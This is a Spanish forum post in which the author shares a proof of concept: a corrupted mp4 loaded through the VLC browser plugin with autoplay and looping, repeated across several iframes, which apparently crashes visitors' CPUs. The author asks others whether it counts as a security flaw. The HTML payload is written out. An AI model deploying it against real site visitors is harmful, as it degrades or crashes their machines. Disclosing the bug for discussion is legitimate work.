No se si esto es realmente un fallo de seguridad o no o si es grave o no y por eso busco la opinión de terceras personas.
Paso a explicar rápidamente la POC que hice para probar si a la gente también se le colapsaba la CPU al visitar la web.
Primero cree un archivo mp4 corrupto que edite con el siguiente contenido inválido
Citar
AAAAAAAAA☺↨↓4♦AAAAAAAAAA☺↨↓4♦AAAAAAAAAA☺↨↓4♦AAAAAAAAAA☺↨↓4♦AAAAAAAAAA☺↨↓
Luego cree un archivo html que cargaba dicho vieo
Código:
<embed type="application/x-vlc-plugin" pluginspage="http://www.videolan.org" version="VideoLAN.VLCPlugin.2" width="100%" height="100%" id="vlc" loop="yes" autoplay="yes" target="a.mp4"></embed>
Código:
<iframe src="a.html"></iframe> <iframe src="a.html"></iframe> <iframe src="a.html"></iframe> <iframe src="a.html"></iframe>
Y el resultado fue el siguiente
Resulta algo penoso que un programa como VLC falle en el manejo de errores.
Saludos, espero sus opiniones.